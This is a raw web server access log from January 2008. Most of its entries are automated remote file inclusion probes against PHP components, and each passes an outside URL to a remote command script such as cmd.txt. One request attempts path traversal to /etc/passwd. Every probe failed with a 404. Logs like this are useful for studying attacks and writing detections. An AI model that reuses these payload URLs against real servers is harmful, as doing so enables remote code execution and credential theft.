66.216.91.36 - - [18/Jan/2008:16:48:26 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:16:48:26 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:16:50:04 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:16:54:38 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:16:54:39 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:16:54:39 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:16:56:55 -0800] "GET //tool/Calendar/tools/send_reminders.php?noSet=http://www.omirinda.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:16:57:00 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:16:57:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.167.33 - - [18/Jan/2008:16:57:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.uhrmacher-balster.de/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
81.169.167.33 - - [18/Jan/2008:16:57:13 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.uhrmacher-balster.de/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:16:57:22 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.3.251 - - [18/Jan/2008:16:58:08 -0800] "GET /logs/access_071219.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ismailiroadtrip.com/images/deca.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [18/Jan/2008:16:58:09 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ismailiroadtrip.com/images/deca.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [18/Jan/2008:16:58:09 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ismailiroadtrip.com/images/deca.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [18/Jan/2008:16:58:15 -0800] "GET /logs/access_071214.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ismailiroadtrip.com/images/deca.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:16:58:50 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:17:00:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:17:00:49 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:17:00:49 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:17:00:49 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.240.89 - - [18/Jan/2008:17:01:07 -0800] "GET /index.php?pagina=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.193.240.89 - - [18/Jan/2008:17:01:07 -0800] "GET /logs/index.php?pagina=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:17:03:21 -0800] "GET //index.php?place=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.167 - - [18/Jan/2008:17:03:38 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 30963 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:17:03:44 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:17:03:44 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:17:03:45 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:17:05:07 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:17:05:08 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.56.111.194 - - [18/Jan/2008:17:05:53 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:06:44 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:17:07:32 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:17:08:20 -0800] "GET /logs/access.log//tool/Calendar/tools/send_reminders.php?noSet=http://www.omirinda.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:17:08:20 -0800] "GET /logs//tool/Calendar/tools/send_reminders.php?noSet=http://www.omirinda.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:09:14 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:09:14 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:09:15 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.222 - - [18/Jan/2008:17:09:41 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:17:10:06 -0800] "GET /logs/access_071112.log//tool/Calendar/tools/send_reminders.php?noSet=http://www.omirinda.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.129 - - [18/Jan/2008:17:10:37 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sisters.or.kr/system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.129 - - [18/Jan/2008:17:10:37 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sisters.or.kr/system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.201.130 - - [18/Jan/2008:17:11:36 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.214.54 - - [18/Jan/2008:17:12:34 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:17:14:24 -0800] "GET /logs/access_071229.log//index.php?place=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:17:14:24 -0800] "GET /logs//index.php?place=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.172 - - [18/Jan/2008:17:14:41 -0800] "GET /retreat1/?D=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:17:16:43 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:17:16:43 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:17:16:58 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:17:16:59 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:17:17:56 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:17:18:35 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:17:18:35 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.43.230.137 - - [18/Jan/2008:17:19:04 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?p=367989#post367989" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
74.6.23.17 - - [18/Jan/2008:17:19:59 -0800] "GET /retreat1/webcam/?D=A HTTP/1.0" 200 196254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.201.130 - - [18/Jan/2008:17:20:59 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [18/Jan/2008:17:20:59 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.214.54 - - [18/Jan/2008:17:21:17 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.214.54 - - [18/Jan/2008:17:21:17 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.49 - - [18/Jan/2008:17:21:19 -0800] "GET /retreat1/webcam/ HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:17:21:50 -0800] "GET /logs/access_071229.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:17:21:52 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:17:21:52 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:22:54 -0800] "GET /minamijewelry/html/testimonials.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
140.113.4.81 - - [18/Jan/2008:17:23:37 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.91.66.79 - - [18/Jan/2008:17:24:28 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:17:24:59 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:25:02 -0800] "GET /logs/access.log HTTP/1.1" 200 413893 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:17:25:30 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.3.183 - - [18/Jan/2008:17:25:48 -0800] "GET /logs/access_071116.log//main.php?p=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [18/Jan/2008:17:25:48 -0800] "GET //main.php?p=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [18/Jan/2008:17:25:48 -0800] "GET /logs//main.php?p=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [18/Jan/2008:17:27:53 -0800] "GET /logs/access_071021.log//main.php?p=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:27:57 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:27:57 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:17:28:39 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:17:28:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:17:28:46 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:17:28:46 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:17:28:46 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:28:47 -0800] "GET /logs/access_080105.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:17:30:52 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:17:31:05 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.158.86 - - [18/Jan/2008:17:31:36 -0800] "GET /logs/access_071122.log/general.php?module=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [18/Jan/2008:17:31:36 -0800] "GET /general.php?module=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [18/Jan/2008:17:31:36 -0800] "GET /logs/general.php?module=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:17:32:56 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:34:03 -0800] "GET /logs/access_080104.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:17:35:02 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:17:35:35 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:17:36:01 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:17:36:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.129 - - [18/Jan/2008:17:36:14 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sisters.or.kr/system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [18/Jan/2008:17:36:30 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [18/Jan/2008:17:36:30 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:17:36:51 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:17:37:04 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:17:37:09 -0800] "GET /logs/access_071219.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:17:37:10 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:17:37:17 -0800] "GET /logs/access_071214.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:17:37:27 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.91.66.79 - - [18/Jan/2008:17:37:29 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.91.66.79 - - [18/Jan/2008:17:37:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:17:38:40 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.106.41 - - [18/Jan/2008:17:40:10 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.106.41 - - [18/Jan/2008:17:40:10 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.106.41 - - [18/Jan/2008:17:40:11 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:17:42:08 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:17:42:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:42:28 -0800] "GET /logs/access_080101.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:42:34 -0800] "GET /logs/access_080102.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:17:42:40 -0800] "GET /logs/access_080103.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.93.212.34 - - [18/Jan/2008:17:42:52 -0800] "GET //skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:17:43:52 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.108.143 - - [18/Jan/2008:17:44:00 -0800] "GET /logs/access_071214.log/becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.219.108.143 - - [18/Jan/2008:17:44:06 -0800] "GET /becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.219.108.143 - - [18/Jan/2008:17:44:06 -0800] "GET /logs/becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.29 - - [18/Jan/2008:17:44:38 -0800] "GET /logs/access_070818.log HTTP/1.0" 200 36125 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:17:44:50 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
